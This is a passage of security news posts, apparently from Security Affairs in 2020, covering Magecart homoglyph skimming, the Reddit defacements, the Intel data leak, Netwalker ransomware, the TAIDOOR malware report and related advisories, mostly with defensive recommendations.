The internationalized domain name (IDN) homograph attack technique has been used by a Magecart group on multiple domains to load the Inter software skimmer inside a favicon file.

The visual trick leverages on the similarities of character scripts to and register fraudulent domains that appear similar to legitimate ones, then attackers trick victims into visiting them.

While analyzing homoglyph attacks, experts also found legitimate websites (e.g., “cigarpage.com”) that were compromised and injected with an innocuous loader for an icon file that loaded a copycat version of the favicon from the typo-squatted domain (“cigarpaqe[.]com”).

This favicon loaded from the homoglyph domain allowed the attackers to inject the Inter JavaScript skimmer.

Experts noticed that one of the fraudulent domains (“zoplm.com”) involved in this type of attack has been previously tied to Magecart Group 8, the crew that was behind the attacks on NutriBullet, and MyPillow.

“A fourth domain stands out from the rest: zoplm.com. This is also an homoglyph for zopim.com, but that domain has a history. It was previously associated with Magecart Group 8 (RiskIQ)/CoffeMokko (Group-IB) and was recently registered again after several months of inactivity.” continues the analysis.

“In addition, Group 8 was documented in high-profile breaches, including one that is relevant here: the MyPillow compromise. This involved injecting a malicious third-party JavaScript hosted on mypiltow.com (note the homoglyph on mypillow.com). While homoglyph attacks are not restricted to one threat actor, especially when it comes to spoofing legitimate web properties, it is still interesting to note in correlation with infrastructure reuse.”

The combination of attack techniques allows threat actors to implement layers of evasion. Code re-use poses a problem for defenders makes the attribution of the attacks harder.

To avoid phishing attacks that are even more sophisticated users have to scrutinize the website URLs that intend to visit, avoid clicking links from emails, chat messages, and other publicly available content, and enable multi-factor authentication for their accounts to secure accounts from being hijacked.

Pierluigi Paganini

(SecurityAffairs – hacking, Homoglyph attacks)

The post Homoglyph attacks used in phishing campaign and Magecart attacks appeared first on Security Affairs.

Reddit massive hack: hackers defaced channels with pro-Trump messages

Reddit suffered a massive hack, threat actors compromised tens of Reddit channels and defaced them showing messages in support of Donald Trump’s campaign.

Reddit suffered a massive hack, threat actors defaced tens of channel to display messages in support of Donald Trump’s reelection campaign.

At the time of writing, the massive hack is still ongoing and Reddit’s security team is working to restore the operations.

Below a list containing some of the impacted subreddits, some of them having tens of millions of members:

According to Reddit, the hacker compromised several subreddit moderator accounts.

Owners of the channel that are facing security issues could report problems in this Reddit ModSupport thread, meantime they are recommended to enable two-factor authentication (2FA) on their accounts and to change their passwords.

Indicators of compromise for the Reddit moderator accounts are:

• moderator received email notification that the password and/or email address on your account changed but you didn’t request changes
• moderator notice authorized apps on your profile that you don’t recognize
• moderator notice unusual IP history on your account activity page
• moderator see votes, posts, comments, or moderation actions that you don’t remember making, or private messages that you don’t remember sending

One of the moderators who had their account compromised published the details of the actions performed by attackers on his behalf.

Help! I’ve been hacked by some bizarre pro-trump bot! It wrecked my subreddit’s style sheet, deleted all mods below me, updated the wiki… I’m in way over my head. What can I do? PSA: Change your passwords and enable 2-factor authentication!” reads the title of the discussion.

Once the attacker has taken the control of the mod’s account, he changed his subrreddit’s CSS stylesheet, deleted all mods with fewer permissions than him, and changed the community’s wiki.

Finally, the hacker published the message: “We Stand With Donal Trump #MIGA2020.”

The Twitter account https://twitter.com/advanceHCAjobs claimed responsibility for the massive Reddit hack, but currently, the account was suspended. While the hackers were targeting subreddits, they asking Twitter users to vote on them.

Source BleepingComputer

In June, Reddit has banned a channel of President Trump supporters, r/The_Donald, after he received reports of harassment, bullying, and threats of violence.

Pierluigi Paganini

(SecurityAffairs – hacking, Trump)

The post Reddit massive hack: hackers defaced channels with pro-Trump messages appeared first on Security Affairs.

Intel investigates security breach after the leak of 20GB of internal documents

Intel is investigating reports of an alleged hack that resulted in the theft and leak of 20GB of data coming from the chip giant.

Intel is investigating reports that an alleged hacker has leaked 20GB of exfiltrated from its systems. The stolen data includes source code and developer documents and tools, some documents are labeled as “confidential” or “restricted secret.”

The hackers shared the documents on the file-sharing site MEGA.

The leak was first published by Till Kottmann, a Swiss software engineer, who manage a very popular Telegram channel on data leak. In the past, he shared data on several leaks from major companies including Microsoft, Adobe, GE, Disney, AMD, Lenovo, Motorola, Qualcomm, Mediatek, and Nintendo.

The engineering received the files from an anonymous hacker who claimed to have hacked the company earlier this year, the experts believe that this leak is just a first lot on a larger collection.

Several media outlets independently analyzed the data leak and verified the authenticity of the data.

“Per our analysis, the leaked files contained Intel intellectual property respective to the internal design of various chipsets. The files contained technical specs, product guides, and manuals for CPUs dating back to 2016.” reported ZDNet.

A company spokesperson told SecurityWeek that the data appears to come from the Intel Resource and Design Center. The Center manages information for use by our customers, partners and other external parties.

Below a list of the content included in the leak:

  • Intel ME Bringup guides + (flash) tooling + samples for various platforms
  • Kabylake (Purley Platform) BIOS Reference Code and Sample Code + Initialization code (some of it as exported git repos with full history)
  • Intel CEFDK (Consumer Electronics Firmware Development Kit (Bootloader stuff)) SOURCES
  • Silicon / FSP source code packages for various platforms
  • Various Development and Debugging Tools
  • Simics Simulation for Rocket Lake S and potentially other platforms
  • Various roadmaps and other documents
  • Binaries for Camera drivers Intel made for SpaceX
  • Schematics, Docs, Tools + Firmware for the unreleased Tiger Lake platform
  • Kabylake FDK training videos
  • Intel Trace Hub + decoder files for various Intel ME versions
  • Elkhart Lake Silicon Reference and Platform Sample Code
  • Debug BIOS/TXE builds for various Platforms
  • Bootguard SDK (encrypted zip)
  • Intel Snowridge / Snowfish Process Simulator ADK
  • Various schematics
  • Intel Marketing Material Templates (InDesign)

The good news is that the leaked files doesn’t contain sensitive data about customers or employees of the chip maker.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Intel investigates security breach after the leak of 20GB of internal documents appeared first on Security Affairs.

Google Threat Analysis Group took down ten influence operations in Q2 2020

Google published its second Threat Analysis Group (TAG) report which reveals the company has taken down ten coordinated operations in Q2 2020.

Google has published its second Threat Analysis Group (TAG) report, a bulletin that includes coordinated influence operation campaigns tracked in Q2 of 2020.

Google revealed to have taken down ten coordinated operations in Q2 2020 (between April and June 2020), the campaigns were traced back to China, Russia, Iran, and Tunisia.

The report is based on the investigations conducted by the Threat Analysis Group (TAG) and third-parties’ contributions (i.e. social media analysis firm Graphika, cyber-security firm FireEye, the Atlantic Council investigation unit).

The latest TAG Bulletin covers influence ops takedowns that have taken place in the second quarter of this year, between April and June 2020.

In April, as part of a campaign carried out by Iran-linked threat actors, Google closed 16 YouTube channels, 1 advertising account and 1 AdSense account. The accounts were linked to the Iranian state-sponsored International Union of Virtual Media (IUVM) network, which also shared content in Arabic related to the US’ response to COVID-19 and the relationship of the US with Saudi Arabia.

Google also terminated 15 YouTube channels and 3 blogs as part of a campaign carried out by Russia-linked threat actors, which posted content in English and Russian about the EU, Lithuania, Ukraine, and the US

The Threat Analysis Group terminated another campaign from Russia, the IT giant closed 7 YouTube channels used to share content in Russian, German, and Farsi about Russian and Syrian politics and the U.S. response to COVID-19.

The TAG team also dismantled another campaign conducted by China-linked attackers. The experts terminated 186 YouTube channels, but only a subset was used to post political content primarily in Chinese, criticizing the response of the US government to the COVID-19 pandemic.

Another campaign blocked by Google leveraged 3 YouTube channels used by Iran-linked hackers to publish content in Bosnian and Arabic that was critical of the U.S. and the People’s Mujahedin Organization of Iran (PMOI), a militant organization fighting against the official Iranian government.

In May the TAG blocked 1,098 YouTube channels used by China-linked hackers to criticize the US’ response to the COVID-19 pandemic.

Google also terminated 47 YouTube channels and 1 AdSense account linked to Russia and used to spread into about domestic Russian and international policy issues.

In June, Google terminated 1,312 YouTube channels used by China-linked threat actors for the same purposes of campaigns reported in April and May.

In the same month, Google terminated 17 YouTube channels linked to Russia 3 Google Play developers and 1 advertising account linked to Tunisian PR company Ureputation.

Pierluigi Paganini

(SecurityAffairs – hacking, Google Threat Analysis Group)

The post Google Threat Analysis Group took down ten influence operations in Q2 2020 appeared first on Security Affairs.

Netwalker ransomware operators claim to have stolen data from Forsee Power

Netwalker ransomware operators breached the networks of Forsee Power, a well-known player in the electromobility market.

A new company has been added to the list of the victims of the Netwalker ransomware operators, it is Forsee Power, which provides advanced lithium-ion battery systems for any mobility application.

The industrial group is based in France and in the US USA, it is one of the market leaders in Europe, Asia, and North America with annual revenue of around $65 million and over 200 employees.

Recently Cyble threat research group came across another disclosure from the Netwalker group that announced to have stolen sensitive data from Forsee Power.

Netwalker ransomware operators announced the attack with a message posted on their online blog and shared a few screenshots as proof of the security breach.

One of the images shared by the group shows a directory containing folders such as Accounts Receivable, Finance, collection letters, Expenses, and Employees. 

Below some tips on how to prevent ransomware attacks provided by Cyble:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Recently the FBI has issued a security alert about Netwalker ransomware attacks targeting U.S. and foreign government organizations.

The feds are recommending victims, not to pay the ransom and reporting incidents to their local FBI field offices.

The flash alert also includes indicators of compromise for the Netwalker ransomware along with mitigations.

The FBI warns of a new wave of Netwalker ransomware attacks that began in June, the list of victims includes the UCSF School of Medicine and the Australian logistics giant Toll Group.

The Netwalker ransomware operators have been very active since March and also took advantage of the ongoing COVID-19 outbreak to target organizations.

The threat actors initially leveraged phishing emails delivering a Visual Basic Scripting (VBS) loader, but since April 2020, Netwalker ransomware operators began exploiting vulnerable Virtual Private Network (VPN) appliances, user interface components in web apps, or weak passwords of Remote Desktop Protocol connections to gain access to their victims’ networks.

Recently the Netwalker ransomware operators were looking for new collaborators that can provide them with access to large enterprise networks. 

Below the recommended mitigations provided by the FBI:

  • Back-up critical data offline.
  • Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
  • Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update anti-virus or anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks.
  • Consider installing and using a VPN.
  • Use two-factor authentication with strong passwords.
  • Keep computers, devices, and applications patched and up-to-date.

Pierluigi Paganini

(SecurityAffairs – Netwalker ransomware, Forsee Power)

The post Netwalker ransomware operators claim to have stolen data from Forsee Power appeared first on Security Affairs.

FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life

The FBI warned private industry partners of risks impacting companies running Windows 7 after the Microsoft OS reached the end of life on January 14.

The Federal Bureau of Investigation is warning companies running Windows 7 systems of the greater risk of getting hacked because the Microsoft OS has reached the end of life on January 14.

Early this week, the FBI has sent a private industry notification (PIN Number 20200803-002) to partners in the US private sector.

“The FBI has observed cyber criminals targeting computer network infrastructure after an operating system achieves end of life status,” reads the the FBI’s PIN.

“Continuing to use Windows 7 within an enterprise may provide cyber criminals access in to computer systems. As time passes, Windows 7 becomes more vulnerable to exploitation due to lack of security updates and new vulnerabilities discovered.”

“With fewer customers able to maintain a patched Windows 7 system after its end of life, cyber criminals will continue to view Windows 7 as a soft target,”

Feds urge organizations to upgrading their systems running Windows 7 to newer versions for which the IT giant is still providing security updates.

“Upgrading operating systems to the latest supported version. Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.” continues the PIN.

Microsoft still allows its Windows 7 users to upgrade to Windows 10 for free, but sometimes the underlying hardware doesn’t support the free upgrade.

The FBI cited the case of previous Windows XP migration, many systems that were not upgraded remained exposed to a significant number of attacks.

“Increased compromises have been observed in the healthcare industry when an operating system has achieved end of life status. After the Windows XP end of life on 28 April 2014, the healthcare industry saw a large increase of exposed records the following year,” the FBI said.

The experts explained that threat actors could exploit multiple known vulnerabilities impacting Windows 7 to compromise the systems running the popular Microsoft OS.

For many of these flaws, it is possible to find online working exploits. such as the EternalBlue and BlueKeep exploits

The FBI added that several companies have yet to patch its systems and urged them to apply the upgrade, the agency also provided the following recommendations:

  • Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
  • Auditing network configurations and isolate computer systems that cannot be updated.
  • Auditing your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life appeared first on Security Affairs.

Cyber Defense Magazine – August 2020 has arrived. Enjoy it!

Cyber Defense Magazine august 2020 Edition has arrived. We hope you enjoy this month’s edition…packed with over 147 pages of excellent content.

OVER 145 PAGESALWAYS FREE – LOADED WITH EXCELLENT CONTENT
Learn from the experts, cybersecurity best practices

Find out about upcoming information security related conferences, expos and trade shows.  Always free, no strings attached.

CLICK THIS FIRST LINK BELOW TO HELP FUND US
(NO CHARGE TO YOU)

OUR ONLINE EBOOK LIBRARY AND THIS PDF FORMAT (PREFERRED – CLICKING THIS LINK HELPS FUND OUR FREE EMAGAZINE)

CLICK BELOW FOR STANDARD PDF FORMAT:

PDF FORMAT

CLICK BELOW FOR AN ONLINE & MOBILE FLIPBOOK VERSION:

ONLINE & MOBILE FLIPBOOK VERSION

www.cyberdefensemagazine.com/newsletters/august-2020/index.html

Do you like Yumpu?  Here’s a Yumpu version:

www.yumpu.com/en/document/view/63770162/cyber-defense-emagazine-august-2020-edition

Enjoy and Thank You for Joining Us!
Let’s get one step ahead of the next threat,
TEAM CYBER DEFENSE MAGAZINE

***NOW ONLINE: OUR SISTER PUBLICATION***
Cyber Security Magazine
with a Consumer Focus (B2C)***NEW***
Don’t miss out: two unique webinars each month….

Cyber Defense Webinars


THINK YOU HAVE WHAT IT TAKES,
WE HAVE A NEW UPCOMING GAME SHOW, WEBINARS AND OUR ANNUAL AWARDS NOW LAUNCHING:
www.cyberdefenseawards.com
Please visit CYBER DEFENSE TV and watch our latest interviews…We have 80+ NEW INTERVIEWS BEING UPLOADED THIS MONTH!!!Please visit Cyber Defense Radio for streaming and downloadable podcasts…THE BLACK UNICORN REPORT FOR 2020 IS NOW ONLINEHighlighted Sponsors This Month:

AIR FORCE CIVILIAN SERVICE
BLACK HAT USA 2020
RSA CONFERENCE 2020Want to sponsor our eMagazine? 

Checkout our 
media kit and reach out to marketing@cyberdefensemagazine.com

Pierluigi Paganini

(SecurityAffairs – hacking, cyber defense magazine)

The post Cyber Defense Magazine – August 2020 has arrived. Enjoy it! appeared first on Security Affairs.

NSA releases a guide to reduce location tracking risks

The United States National Security Agency (NSA) is warning of risks posed by location services for staff who work in defence or national security.

The United States National Security Agency (NSA) published a new guide to warn of the risks posed by location services for staff who work in defence or national security.

The guide, titled “Limiting Location Data Exposure” warn of geolocation features implemented by smartphones, tablets, and fitness trackers.

“Mobile devices store and share device geolocation data by design. This data is essential to device communications and provides features—such as mapping applications—that users consider indispensable. Mobile devices determine location through any combination of Global Positioning System (GPS) and wireless signals (e.g., cellular, wireless (Wi-Fi®1 ), or Bluetooth®2 (BT)).” reads the NSA’s guide. “Location data can be extremely valuable and must be protected. It can reveal details about the number of users in a location, user and supply movements, daily routines (user and organizational), and can expose otherwise unknown associations between users and locations.”

The agency reminds its staff that location data are extremely valuable information that must be properly protected. It can reveal the position of the individuals, user and supply movements, and daily routines, among others. The exposure of such data is especially critical for personnel of intelligence agencies and defense.

The guide pointed that such location devices may have been designed to store or transmit location data even when location settings or all wireless capabilities have been disabled.

The guide also highlights that location data from a mobile device can be obtained even without provider cooperation. An attacker could use commercially available rogue base stations to easily obtain real-time location data and track targets.

“This equipment is difficult to distinguish from legitimate equipment, and devices will automatically try to connect to it, if it is the strongest signal present.” continues the guide.

Mitigations could help to reduce, but do not eliminate, location tracking risks in mobile devices. In many cases, users rely on features disabled by such mitigations, making such safeguards impractical.

The guide includes multiple mitigations, including turning off radios when not in use, disabling features like “Find my Phone,” and using a VPN,

The experts also recommend disabling advertising permissions to the greatest extent possible by limiting ad tracking and resetting the advertising ID for the device on a regular basis (at least on a weekly basis).

“While it may not always be possible to completely prevent the exposure of location information, it is possible—through careful configuration and use—to reduce the amount of location data shared,” the guide concludes. “Awareness of the ways in which such information is available is the first step.”

Pierluigi Paganini

(SecurityAffairs – NSA, location services)

The post NSA releases a guide to reduce location tracking risks appeared first on Security Affairs.

UberEats data leaked on the dark web

Security researchers from threat intelligence firm Cyble have discovered user records of American online food ordering and delivery platform UberEats on DarkWeb.

Another day, another data breach made the headlines, this time the alleged victim is UberEATS.

UberEats is an American online food ordering and delivery platform launched by Uber in 2014.

During the process of darkweb and deep web monitoring, the Cyble Research Team came across a threat actor who leaked user records of UberEATS. 

The researchers were able to analyze some files leaked by the threat actors containing UberEATS delivery drivers, delivery partners, and customers.

“During our research process, the Cyble Research Team got hold of some informative details related to this leak.” reads the post published by Cyble.

The experts analyzed 9 TXT files leaked by the threat actor which contained details of UberEATS delivery drivers, delivery partners, and customers. The leaked files also include login credentials of 579 UberEATS customers and details of 100 delivery drivers.

Exposed records include information such as login credentials, full name, contact number, trip details, bank card details, account creation date.

UberEats

Cyble researchers provided the following recommendations:

  • Never share personal information, including financial information over the phone, email or SMSs
  • Use strong passwords and enforce multi-factor authentication where possible
  • Regularly monitor your financial transaction, if you notice any suspicious transaction, contact your bank immediately.
  • Turn-on automatic software update feature on your computer, mobile and other connected devices where possible and pragmatic
  • Use a reputed anti-virus and internet security software package on your connected devices including PC, Laptop, Mobile
  • People who are concerned about their exposure in darkweb can register at AmiBreached.com to ascertain their exposure.

Pierluigi Paganini

(SecurityAffairs – hacking, UberEats)

The post UberEats data leaked on the dark web appeared first on Security Affairs.

US govt agencies share details of the China-linked espionage malware Taidoor

China-linked hackers carried out cyber espionage campaigns targeting governments, corporations, and think tanks with TAIDOOR malware

The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense (DoD) released information on a RAT variant, dubbed TAIDOOR, used by China-linked hackers in cyber espionage campaigns targeting governments, corporations, and think tanks.

“The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD) have identified a malware variant—referred as TAIDOOR—used by the Chinese government.” reads the US CISA alert.

“CISA encourages users and administrators to review Malware Analysis Report MAR-10292089-1.v1, U.S. Cyber Command’s VirusTotal page, and CISA’s Chinese Malicious Cyber Activity page for more information.”

The U.S. Cyber Command has also uploaded four TAIDOOR samples to the repository VirusTotal.

US government agencies published the Malware Analysis Report MAR-10292089-1.v1 (AR20-216A) that includes technical details of the malicious code, such as indicators of compromise (IOCs) and YARA rules for each of sample analyzed by the experts.

“FBI has high confidence that Chinese government actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. CISA, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to Chinese government malicious cyber activity.” reads Malware Analysis Report MAR-10292089-1.v1.

“This MAR includes suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.”

In July, US Justice Department accused two Chinese hackers of stealing trade secrets from companies worldwide and targeting firms developing a COVID-19 vaccine. In May, the FBI and CISA also warned cyber attacks coordinated by Beijing and attempting to steal COVID-19 information from US health care, pharmaceutical, and research industry sectors.

The CISA agency provides recommendations for system administrators and owners to enhance the level of security of their organizations:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Pierluigi Paganini

(SecurityAffairs – hacking, Taidoor)

The post US govt agencies share details of the China-linked espionage malware Taidoor appeared first on Security Affairs.